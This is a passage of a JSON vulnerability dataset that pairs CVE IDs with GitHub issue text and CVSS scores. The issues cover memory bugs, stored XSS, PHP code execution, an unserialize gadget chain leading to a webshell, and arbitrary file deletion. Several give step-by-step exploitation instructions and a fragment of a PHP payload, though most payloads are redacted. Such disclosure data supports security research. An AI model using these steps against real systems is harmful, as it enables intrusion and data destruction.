  68742. "baseScore": 8.8,
  68743. "impactScore": 5.9,
  68744. "exploitabilityScore": 2.8
  68745. },
  68746. {
  68747. "CVE_ID": "CVE-2021-36513",
  68748. "Issue_Url_old": "https://github.com/signalwire/freeswitch/issues/1245",
  68749. "Issue_Url_new": "https://github.com/signalwire/freeswitch/issues/1245",
  68750. "Repo_new": "signalwire/freeswitch",
  68751. "Issue_Created_At": "2021-06-29T23:15:58Z",
  68752. "description": "Use of uninitialized value. There are a few uninitialized-value-use bugs in PATHTAG In function APITAG the array network_ip is allocated on the stack at line NUMBERTAG CODETAG It is then supposed to be initialized by APITAG NUMBERTAG sofia_glue_get_addr(de >data >e_msg, network_ip, sizeof(network_ip), NULL NUMBERTAG for NUMBERTAG profile >acl_count NUMBERTAG last_acl = profile >acl NUMBERTAG if (!(acl_ok = APITAG last_acl NUMBERTAG break; However, APITAG may return early without writing to the buffer, leaving network_ip in an uninitialized state. network_ip is then used in APITAG so the ACL check is evaluated against stale stack contents instead of the peer's real address, which may bypass the (ACL) security checks and lead to privilege escalation. Same in: CODETAG and in function APITAG CODETAG and in function APITAG CODETAG APITAG may return early, leaving network_ip in an uninitialized state. network_ip is then used in function APITAG which may print out sensitive stale data left in network_ip by a previous stack frame. Fix: set network_ip NUMBERTAG (zero-initialize the buffer) so it never holds uninitialized data. Thank you for the review; I have also reported this bug for a CVE.",
  68753. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  68754. "severity": "HIGH",
  68755. "baseScore": 7.5,
  68756. "impactScore": 3.6,
  68757. "exploitabilityScore": 3.9
  68758. },
  68759. {
  68760. "CVE_ID": "CVE-2021-3652",
  68761. "Issue_Url_old": "https://github.com/389ds/389-ds-base/issues/4817",
  68762. "Issue_Url_new": "https://github.com/389ds/389-ds-base/issues/4817",
  68763. "Repo_new": "389ds/389-ds-base",
  68764. "Issue_Created_At": "2021-06-29T12:56:33Z",
  68765. "description": "CRYPT password hash with asterisk. Issue Description If an entry contains an asterisk as the crypted password hash, binding is possible with any password for this entry APITAG {CRYPT} Package Version and Platform: Platform: APITAG Leap NUMBERTAG Package and version NUMBERTAG ds NUMBERTAG APITAG APITAG Browser firefox Steps to Reproduce Steps to reproduce the behavior NUMBERTAG Create an entry (e.g. a APITAG with the APITAG set to \"{CRYPT}*\", e.g. by importing it from an ldif file NUMBERTAG Try to bind with that entry using an arbitrary password (e.g. \"llhh NUMBERTAG Check whether the bind was successful Expected results I would expect the bind to fail with any password, because the asterisk is not a valid character in a crypt hash and a comparison against it should never succeed. Screenshots If applicable, add screenshots to help explain your problem. Additional context The problem occurred after importing entries from a NIS database. In NIS (and in /etc/shadow), the asterisk is commonly used as a locked-password marker for special accounts like \"nobody\", so accepting it effectively turns locked accounts into accounts that accept any password.",
  68766. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
  68767. "severity": "MEDIUM",
  68768. "baseScore": 6.5,
  68769. "impactScore": 2.5,
  68770. "exploitabilityScore": 3.9
  68771. },
  68772. {
  68773. "CVE_ID": "CVE-2021-36530",
  68774. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/19",
  68775. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/19",
  68776. "Repo_new": "miniupnp/ngiflib",
  68777. "Issue_Created_At": "2021-06-30T02:36:51Z",
  68778. "description": "APITAG heap buffer overflow in APITAG at APITAG in NGIFLIB_NO_FILE mode. Similar to NUMBERTAG this overflow occurs because, in NGIFLIB_NO_FILE mode, APITAG copies from the in-memory input buffer without checking the boundary. Test Environment Ubuntu NUMBERTAG bit ngiflib(master NUMBERTAG fd4) How to trigger NUMBERTAG Compile the program with APITAG in NGIFLIB_NO_FILE mode APITAG NUMBERTAG run the compiled program APITAG POC file URLTAG Details ASAN report ERRORTAG",
  68779. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68780. "severity": "HIGH",
  68781. "baseScore": 8.8,
  68782. "impactScore": 5.9,
  68783. "exploitabilityScore": 2.8
  68784. },
  68785. {
  68786. "CVE_ID": "CVE-2021-36531",
  68787. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/18",
  68788. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/18",
  68789. "Repo_new": "miniupnp/ngiflib",
  68790. "Issue_Created_At": "2021-06-30T02:34:21Z",
  68791. "description": "APITAG heap buffer overflow in APITAG at APITAG in NGIFLIB_NO_FILE mode. This overflow occurs because, in NGIFLIB_NO_FILE mode, APITAG reads from the in-memory input buffer without checking the boundary. Test Environment Ubuntu NUMBERTAG bit ngiflib(master NUMBERTAG fd4) How to trigger NUMBERTAG Compile the program with APITAG in NGIFLIB_NO_FILE mode APITAG NUMBERTAG run the compiled program APITAG POC file URLTAG Details ASAN report ERRORTAG",
  68792. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68793. "severity": "HIGH",
  68794. "baseScore": 8.8,
  68795. "impactScore": 5.9,
  68796. "exploitabilityScore": 2.8
  68797. },
  68798. {
  68799. "CVE_ID": "CVE-2021-36547",
  68800. "Issue_Url_old": "https://github.com/r0ck3t1973/RCE/issues/1",
  68801. "Issue_Url_new": "https://github.com/r0ck3t1973/rce/issues/1",
  68802. "Repo_new": "r0ck3t1973/rce",
  68803. "Issue_Created_At": "2020-09-01T08:04:38Z",
  68804. "description": "Remote Code Execution via Snippets module in Mara version NUMBERTAG Describe the bug / An authenticated attacker can upload a file containing arbitrary PHP code through the Snippets module and execute commands on the server / To Reproduce NUMBERTAG Log into the panel NUMBERTAG Click APITAG >> New ( PATHTAG NUMBERTAG Click File Upload NUMBERTAG Insert payload php: FILETAG NUMBERTAG Save and Exit NUMBERTAG Go to PATHTAG / Screenshots NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG",
  68805. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68806. "severity": "CRITICAL",
  68807. "baseScore": 9.8,
  68808. "impactScore": 5.9,
  68809. "exploitabilityScore": 3.9
  68810. },
  68811. {
  68812. "CVE_ID": "CVE-2021-36548",
  68813. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/470",
  68814. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/470",
  68815. "Repo_new": "monstra-cms/monstra",
  68816. "Issue_Created_At": "2021-07-05T02:51:41Z",
  68817. "description": "RCE APITAG Code Execution via Theme Blog Monstra version NUMBERTAG Describe the bug An authenticated attacker can inject arbitrary PHP code through the Theme Blog editor and execute commands on the server To Reproduce NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click edit Blog NUMBERTAG Insert payload FILETAG APITAG APITAG <form method=\"GET\" name=\"<?php echo basename($_SERVER FILETAG FILETAG",
  68818. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68819. "severity": "CRITICAL",
  68820. "baseScore": 9.8,
  68821. "impactScore": 5.9,
  68822. "exploitabilityScore": 3.9
  68823. },
  68824. {
  68825. "CVE_ID": "CVE-2021-36550",
  68826. "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/6",
  68827. "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/6",
  68828. "Repo_new": "r0ck3t1973/xss_payload",
  68829. "Issue_Created_At": "2021-07-07T12:52:26Z",
  68830. "description": "Bypass Cross Site Script Vulnerability on APITAG in APITAG version NUMBERTAG Hi, I found stored xss in Categories. To Reproduce NUMBERTAG Login into the panel NUMBERTAG Go to Documents: 'tiki NUMBERTAG tiki APITAG NUMBERTAG Click Categories: PATHTAG NUMBERTAG Create category NUMBERTAG insert payload bypass xss: APITAG APITAG APITAG NUMBERTAG Click Categories >> Click2 >> Boom alert message xss! Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. POC FILETAG FILETAG FILETAG",
  68831. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  68832. "severity": "MEDIUM",
  68833. "baseScore": 5.4,
  68834. "impactScore": 2.7,
  68835. "exploitabilityScore": 2.3
  68836. },
  68837. {
  68838. "CVE_ID": "CVE-2021-36551",
  68839. "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/7",
  68840. "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/7",
  68841. "Repo_new": "r0ck3t1973/xss_payload",
  68842. "Issue_Created_At": "2021-07-07T12:53:38Z",
  68843. "description": "Bypass Cross Site Script Vulnerability on APITAG in APITAG version NUMBERTAG Hi Team, I found stored xss in Calendar To Reproduce NUMBERTAG Login into panel NUMBERTAG Go to Documents: PATHTAG NUMBERTAG Click Calendar: PATHTAG NUMBERTAG Click Add Event NUMBERTAG insert payload bypass xss in Description APITAG NUMBERTAG Click Details Event >> APITAG Boom alert message xss! Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. POC FILETAG FILETAG FILETAG",
  68844. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  68845. "severity": "MEDIUM",
  68846. "baseScore": 5.4,
  68847. "impactScore": 2.7,
  68848. "exploitabilityScore": 2.3
  68849. },
  68850. {
  68851. "CVE_ID": "CVE-2021-36564",
  68852. "Issue_Url_old": "https://github.com/top-think/framework/issues/2559",
  68853. "Issue_Url_new": "https://github.com/top-think/framework/issues/2559",
  68854. "Repo_new": "top-think/framework",
  68855. "Issue_Created_At": "2021-07-02T13:21:46Z",
  68856. "description": "APITAG has an unserialize vulnerability. thinkphp NUMBERTAG has an unserialize vulnerability Vulnerability Demo Create a route at APITAG ERRORTAG this is my poc ERRORTAG The file has been written to the public directory Vulnerability Analysis The gadget chain starts with __destruct; autosave can be bypassed by assigning it a value of true FILETAG finally reaching APITAG FILETAG which happens to call the file_put_contents method FILETAG The parameters are all attacker-controlled, but we need to bypass the APITAG method, otherwise passing in escape symbols would also be output by APITAG Here I pass in APITAG which is commented out in front, and what follows APITAG is separated, causing the vulnerability; analysis complete",
  68857. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68858. "severity": "CRITICAL",
  68859. "baseScore": 9.8,
  68860. "impactScore": 5.9,
  68861. "exploitabilityScore": 3.9
  68862. },
  68863. {
  68864. "CVE_ID": "CVE-2021-36567",
  68865. "Issue_Url_old": "https://github.com/top-think/framework/issues/2561",
  68866. "Issue_Url_new": "https://github.com/top-think/framework/issues/2561",
  68867. "Repo_new": "top-think/framework",
  68868. "Issue_Created_At": "2021-07-02T13:42:08Z",
  68869. "description": "PHP unserialize vulnerability in NUMBERTAG PHP unserialize vulnerability in NUMBERTAG Vulnerability Demo This chain does not echo its output back on the web page, but it can execute system commands, and this public chain differs slightly from the ones found on the Internet First, simply write a route ERRORTAG exp ERRORTAG Attempt to write file successful FILETAG Ant sword connection successful FILETAG",
  68870. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68871. "severity": "CRITICAL",
  68872. "baseScore": 9.8,
  68873. "impactScore": 5.9,
  68874. "exploitabilityScore": 3.9
  68875. },
  68876. {
  68877. "CVE_ID": "CVE-2021-36584",
  68878. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1842",
  68879. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1842",
  68880. "Repo_new": "gpac/gpac",
  68881. "Issue_Created_At": "2021-07-06T02:59:40Z",
  68882. "description": "heap buffer overflow in gp_rtp_builder_do_t NUMBERTAG g. Hello, a heap buffer overflow occurs when running the program APITAG and can be reproduced on the latest commit. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of gpac APITAG APITAG NUMBERTAG run APITAG APITAG asan info ERRORTAG source code ERRORTAG",
  68883. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68884. "severity": "MEDIUM",
  68885. "baseScore": 5.5,
  68886. "impactScore": 3.6,
  68887. "exploitabilityScore": 1.8
  68888. },
  68889. {
  68890. "CVE_ID": "CVE-2021-3660",
  68891. "Issue_Url_old": "https://github.com/cockpit-project/cockpit/issues/16122",
  68892. "Issue_Url_new": "https://github.com/cockpit-project/cockpit/issues/16122",
  68893. "Repo_new": "cockpit-project/cockpit",
  68894. "Issue_Created_At": "2021-07-20T13:49:33Z",
  68895. "description": "Is cockpit vulnerable to clickjacking?. Through a security scan, I was notified: > APITAG remote web server does not set an X Frame Options response header or a Content Security Policy 'frame ancestors' response header in all content responses. This could potentially expose the site to a clickjacking or UI redress attack, in which an attacker can trick a user into clicking an area of the vulnerable page that is different than what the user perceives the page to be. This can result in a user performing fraudulent or malicious transactions._ Suggested solution is: > Return the X Frame Options or Content Security Policy (with the 'frame ancestors' directive) HTTP header with the page's response. Is there a way to do this through the config in cockpit? or is there some other reason it is not subject to clickjacking? Thank you",
  68896. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  68897. "severity": "MEDIUM",
  68898. "baseScore": 4.3,
  68899. "impactScore": 1.4,
  68900. "exploitabilityScore": 2.8
  68901. },
  68902. {
  68903. "CVE_ID": "CVE-2021-36605",
  68904. "Issue_Url_old": "https://github.com/3xxx/engineercms/issues/52",
  68905. "Issue_Url_new": "https://github.com/3xxx/engineercms/issues/52",
  68906. "Repo_new": "3xxx/engineercms",
  68907. "Issue_Created_At": "2021-07-06T14:16:22Z",
  68908. "description": "APITAG has a stored XSS vulnerability. Description There is no escaping in the nickname field on the user list APITAG viewing this page, the APITAG code will be executed in the user's browser. Impact Version NUMBERTAG Steps to Reproduce APITAG the profile page after logging in\uff0c APITAG APITAG on the nickname and insert the javascript code\uff0c ERRORTAG APITAG save, the payload has been executed FILETAG The original request is as follows\uff1a ERRORTAG",
  68909. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  68910. "severity": "MEDIUM",
  68911. "baseScore": 5.4,
  68912. "impactScore": 2.7,
  68913. "exploitabilityScore": 2.3
  68914. },
  68915. {
  68916. "CVE_ID": "CVE-2021-3664",
  68917. "Issue_Url_old": "https://github.com/unshiftio/url-parse/issues/205",
  68918. "Issue_Url_new": "https://github.com/unshiftio/url-parse/issues/205",
  68919. "Repo_new": "unshiftio/url-parse",
  68920. "Issue_Created_At": "2021-05-25T16:12:20Z",
  68921. "description": "URLs with no hostname not parsed properly in NUMBERTAG Hi there, I'm using this library to parse URLs with a custom protocol like so: APITAG The behaviour has changed in NUMBERTAG so that part of the pathname is being treated as the host. I believe this is a bug and goes against the browser implementation of URL , which produces output similar to NUMBERTAG with the hostname unset. Since downstream code may make hostname-based security decisions, misattributing path text to the host is not merely cosmetic. I think it's due to the change in regex match here URLTAG . Output in NUMBERTAG CODETAG Output in NUMBERTAG CODETAG Let me know if you need any more details. Thanks!",
  68922. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  68923. "severity": "MEDIUM",
  68924. "baseScore": 5.3,
  68925. "impactScore": 1.4,
  68926. "exploitabilityScore": 3.9
  68927. },
  68928. {
  68929. "CVE_ID": "CVE-2021-3664",
  68930. "Issue_Url_old": "https://github.com/unshiftio/url-parse/issues/206",
  68931. "Issue_Url_new": "https://github.com/unshiftio/url-parse/issues/206",
  68932. "Repo_new": "unshiftio/url-parse",
  68933. "Issue_Created_At": "2021-07-22T14:24:06Z",
  68934. "description": "Security issues Hostname spoofing & Open Redirect. MENTIONTAG MENTIONTAG I have reported a security issue in huntr URLTAG There are NUMBERTAG attack scenarios possible for Open Redirect and Hostname APITAG take a look at the last comment) Please validate and let us know your opinion on this. Thank you.",
  68935. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  68936. "severity": "MEDIUM",
  68937. "baseScore": 5.3,
  68938. "impactScore": 1.4,
  68939. "exploitabilityScore": 3.9
  68940. },
  68941. {
  68942. "CVE_ID": "CVE-2021-36654",
  68943. "Issue_Url_old": "https://github.com/boiteasite/cmsuno/issues/17",
  68944. "Issue_Url_new": "https://github.com/boiteasite/cmsuno/issues/17",
  68945. "Repo_new": "boiteasite/cmsuno",
  68946. "Issue_Created_At": "2021-07-09T00:02:59Z",
  68947. "description": "APITAG NUMBERTAG stored XSS. Hi :) cmsuno version NUMBERTAG is vulnerable to stored cross-site scripting. An authenticated attacker can inject a payload into the tgo parameter while updating the template's image filename, by intercepting the request with Burp Suite. After the template is updated, the XSS payload fires on the public website page. Steps to reproduce NUMBERTAG Go to FILETAG and click on plugins NUMBERTAG Click on Logo FILETAG NUMBERTAG Choose a random picture in your files repository, click on save and intercept the request using APITAG NUMBERTAG Change the tgo parameter value to the following FILETAG NUMBERTAG Forward the request and click on publish FILETAG NUMBERTAG Click on See the website FILETAG NUMBERTAG SS FILETAG FILETAG Thanks",
  68948. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  68949. "severity": "MEDIUM",
  68950. "baseScore": 5.4,
  68951. "impactScore": 2.7,
  68952. "exploitabilityScore": 2.3
  68953. },
  68954. {
  68955. "CVE_ID": "CVE-2021-36691",
  68956. "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/422",
  68957. "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/422",
  68958. "Repo_new": "libjxl/libjxl",
  68959. "Issue_Created_At": "2021-08-08T09:14:24Z",
  68960. "description": "Assertion failed in PATHTAG APITAG Describe the bug Assertion failed when compressing a gif with cjxl. CODETAG To Reproduce Steps to reproduce the behavior: CODETAG FILETAG Expected behavior No assertion failed. Environment OS: APITAG Compiler version: APITAG CPU type NUMBERTAG cjxl/djxl version string: cjxl NUMBERTAG f3e APITAG Additional context It seems that the memory allocation size is too large causing the assertion failed. URLTAG Some gdb information ERRORTAG",
  68961. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  68962. "severity": "HIGH",
  68963. "baseScore": 7.5,
  68964. "impactScore": 3.6,
  68965. "exploitabilityScore": 3.9
  68966. },
  68967. {
  68968. "CVE_ID": "CVE-2021-36692",
  68969. "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/308",
  68970. "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/308",
  68971. "Repo_new": "libjxl/libjxl",
  68972. "Issue_Created_At": "2021-07-09T12:29:54Z",
  68973. "description": "A stack use after scope issue with cjxl encode routine. Describe the bug A stack use after scope issue was discovered in cjxl encode routine when building with ASAN. To Reproduce Steps to reproduce the behavior: CODETAG The crash file FILETAG . Expected behavior cjxl should encode the PNG to JXL successfully. Environment OS NUMBERTAG generic NUMBERTAG Ubuntu Compiler version: clang version NUMBERTAG CPU type NUMBERTAG cjxl/djxl version string: cjxl NUMBERTAG APITAG Additional context ERRORTAG ERRORTAG",
  68974. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68975. "severity": "MEDIUM",
  68976. "baseScore": 6.5,
  68977. "impactScore": 3.6,
  68978. "exploitabilityScore": 2.8
  68979. },
  68980. {
  68981. "CVE_ID": "CVE-2021-36701",
  68982. "Issue_Url_old": "https://github.com/danpros/htmly/issues/481",
  68983. "Issue_Url_new": "https://github.com/danpros/htmly/issues/481",
  68984. "Repo_new": "danpros/htmly",
  68985. "Issue_Created_At": "2021-07-11T05:35:39Z",
  68986. "description": "Arbitrary file deletion and Persistent XSS exist in htmly NUMBERTAG An arbitrary file deletion vulnerability in the backend In PATHTAG line NUMBERTAG ERRORTAG When deleting our backup files, we can delete any file on the system through directory traversal in the file field. APITAG example: After logging in, go to setting > backup > Create backup, then click delete to obtain a link. Modify the file field to APITAG and submit. CODETAG The administrator information has been deleted and no one can log in to the system NUMBERTAG Persistent XSS on Blog title Since the Blog title is not processed by htmlentities APITAG when we modify the Blog title to APITAG , JavaScript is executed. APITAG APITAG NUMBERTAG Persistent XSS when creating a regular blog post. When creating a regular blog post, enter APITAG in Content and visit the article; JavaScript is executed. APITAG APITAG",
  68987. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  68988. "severity": "CRITICAL",
  68989. "baseScore": 9.1,
  68990. "impactScore": 5.2,
  68991. "exploitabilityScore": 3.9
  68992. },
  68993. {
  68994. "CVE_ID": "CVE-2021-36797",
  68995. "Issue_Url_old": "https://github.com/victronenergy/venus/issues/836",
  68996. "Issue_Url_new": "https://github.com/victronenergy/venus/issues/836",
  68997. "Repo_new": "victronenergy/venus",
  68998. "Issue_Created_At": "2021-07-13T18:59:06Z",
  68999. "description": "APITAG Root login by default. I am using APITAG on a Raspberry Pi for testing purposes and it seems that the default account setup is against security best practices: Root login should be disabled with all access which requires root done through sudo A standard user should be configured for normal access (e.g. pi ) A default password may be provided but it should be forcibly changed on first login Auto login should be disabled by default The documentation should recommend changing the password As it is at the moment, there are likely many devices running APITAG with unsecured root privileges available by default. It would also be beneficial to add a security policy to this repo so that vulnerabilities such as this can be highlighted in private while they are addressed: URLTAG",
  69000. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69001. "severity": "MEDIUM",
  69002. "baseScore": 6.8,
  69003. "impactScore": 5.9,
  69004. "exploitabilityScore": 0.9
  69005. },
  69006. {
  69007. "CVE_ID": "CVE-2021-3681",
  69008. "Issue_Url_old": "https://github.com/ansible/galaxy/issues/1977",
  69009. "Issue_Url_new": "https://github.com/ansible/galaxy/issues/1977",
  69010. "Repo_new": "ansible/galaxy",
  69011. "Issue_Created_At": "2019-08-07T14:36:37Z",
  69012. "description": "Galaxy admin can't deprecate collections. A Galaxy admin should be able to deprecate other accounts' collections.",
  69013. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  69014. "severity": "MEDIUM",
  69015. "baseScore": 5.5,
  69016. "impactScore": 3.6,
  69017. "exploitabilityScore": 1.8
  69018. },
  69019. {
  69020. "CVE_ID": "CVE-2021-36977",
  69021. "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/272",
  69022. "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/272",
  69023. "Repo_new": "hdfgroup/hdf5",
  69024. "Issue_Created_At": "2021-01-19T20:42:49Z",
  69025. "description": "Delegating open fuzzing issues of libmatio to hdf5. OSS library matio URLTAG is being continuously fuzzed by the oss fuzz URLTAG service. Most of the open matio fuzzing issues CVETAG seem to be related to the hdf NUMBERTAG library dependency, which is not being fuzzed by oss fuzz. Whom can I add as a contact person for these issues? I believe the mail address needs to be set up as a Google account in order to get access? See also URLTAG where I first raised this topic. FYI APITAG chromium",
  69026. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69027. "severity": "MEDIUM",
  69028. "baseScore": 6.5,
  69029. "impactScore": 3.6,
  69030. "exploitabilityScore": 2.8
  69031. },
  69032. {
  69033. "CVE_ID": "CVE-2021-36977",
  69034. "Issue_Url_old": "https://github.com/google/oss-fuzz/issues/4999",
  69035. "Issue_Url_new": "https://github.com/google/oss-fuzz/issues/4999",
  69036. "Repo_new": "google/oss-fuzz",
  69037. "Issue_Created_At": "2021-01-18T20:18:24Z",
  69038. "description": "What to do if an issue is raised in a dependent library?. Most of the open matio fuzzing issues CVETAG seem to be related to the hdf NUMBERTAG library dependency, which is not being fuzzed by oss fuzz. What can I do to get these open issues properly addressed? Can I reassign them to the HDF5 developers URLTAG ? Can we add a secondary contact to the APITAG",
  69039. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69040. "severity": "MEDIUM",
  69041. "baseScore": 6.5,
  69042. "impactScore": 3.6,
  69043. "exploitabilityScore": 2.8
  69044. },
  69045. {
  69046. "CVE_ID": "CVE-2021-37144",
  69047. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/32",
  69048. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/32",
  69049. "Repo_new": "cskaza/cszcms",
  69050. "Issue_Created_At": "2021-07-20T20:33:42Z",
  69051. "description": "Bug Report: Multiple Arbitrary File Deletion vulnerability. Vulnerability Name: Multiple Arbitrary File Deletion Date of Discovery NUMBERTAG July NUMBERTAG Product version NUMBERTAG Download link URLTAG Author: faisalfs NUMBERTAG Vulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the APITAG function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms, such as deleting the .htaccess file that enforces those security constraints. Proof of Concept NUMBERTAG Vulnerable URL: URLTAG Vulnerable Code: line NUMBERTAG PATHTAG FILETAG Steps to Reproduce NUMBERTAG Login as admin NUMBERTAG Go to Plugin Manager > Article > edit any article NUMBERTAG Upload any image as APITAG Picture\" and APITAG Upload\" and click save button NUMBERTAG Click APITAG File\" button for both APITAG Picture\" and APITAG Upload\" and click save button NUMBERTAG Intercept the request and replace the existing image filename with the path of any file on the server via the parameters \"del_file\" and \"del_file2\" FILETAG Proof of Concept NUMBERTAG Vulnerable URL: URLTAG Vulnerable Code: line NUMBERTAG PATHTAG FILETAG Steps to Reproduce NUMBERTAG Login as admin NUMBERTAG Go to General Menu > Site Setting NUMBERTAG Upload any image as APITAG Logo\" and APITAG of og metatag\" and click save button NUMBERTAG Click APITAG File\" button for both APITAG Logo\" and APITAG of og metatag\" and click save button NUMBERTAG Intercept the request and replace the existing image filename with the path of any file on the server via the parameters \"del_file\" and \"del_og_image\" FILETAG",
  69052. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  69053. "severity": "CRITICAL",
  69054. "baseScore": 9.1,
  69055. "impactScore": 5.2,
  69056. "exploitabilityScore": 3.9
  69057. },
  69058. {
  69059. "CVE_ID": "CVE-2021-37231",
  69060. "Issue_Url_old": "https://github.com/wez/atomicparsley/issues/30",
  69061. "Issue_Url_new": "https://github.com/wez/atomicparsley/issues/30",
  69062. "Repo_new": "wez/atomicparsley",
  69063. "Issue_Created_At": "2021-07-09T10:40:38Z",
  69064. "description": "A stack buffer overflow occurs while parsing a file. S ystem Configuration APITAG version: atomicparsley APITAG ERRORTAG NUMBERTAG f Used arguments: T NUMBERTAG t + Environment APITAG system, version and so on): Ubuntu NUMBERTAG bit Additional information: compilation with asan NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fffffffd NUMBERTAG at pc NUMBERTAG ffff NUMBERTAG e NUMBERTAG d bp NUMBERTAG fffffffd NUMBERTAG sp NUMBERTAG fffffffcce8 WRITE of size NUMBERTAG at NUMBERTAG fffffffd NUMBERTAG thread T0 Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffff6ffcc NUMBERTAG in ?? () from PATHTAG NUMBERTAG ffff6ffe NUMBERTAG b in APITAG () from PATHTAG NUMBERTAG ffff NUMBERTAG b4a NUMBERTAG in ?? () from PATHTAG NUMBERTAG ffff NUMBERTAG af7f7 in ?? () from PATHTAG NUMBERTAG ffff NUMBERTAG ed in ?? () from PATHTAG NUMBERTAG ffff NUMBERTAG in ?? () from PATHTAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG af in ?? () from PATHTAG NUMBERTAG fd NUMBERTAG in fread (__stream NUMBERTAG n NUMBERTAG c, __size NUMBERTAG ptr NUMBERTAG fffffffd6cd) at PATHTAG NUMBERTAG APITAG (buffer NUMBERTAG fffffffd6cd \"\", APITAG pos=<optimized out>, length NUMBERTAG c) at PATHTAG ERRORTAG PATHTAG NUMBERTAG a NUMBERTAG d0 in APITAG APITAG \"\", APITAG APITAG APITAG at PATHTAG ERRORTAG PATHTAG NUMBERTAG a NUMBERTAG b in APITAG (isofile=<optimized out>, optional_output=<optimized out>) at PATHTAG ERRORTAG PATHTAG I've attached the file. Please download and check the file. FILETAG",
  69065. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69066. "severity": "MEDIUM",
  69067. "baseScore": 5.5,
  69068. "impactScore": 3.6,
  69069. "exploitabilityScore": 1.8
  69070. },
  69071. {
  69072. "CVE_ID": "CVE-2021-37232",
  69073. "Issue_Url_old": "https://github.com/wez/atomicparsley/issues/32",
  69074. "Issue_Url_new": "https://github.com/wez/atomicparsley/issues/32",
  69075. "Repo_new": "wez/atomicparsley",
  69076. "Issue_Created_At": "2021-07-13T05:27:45Z",
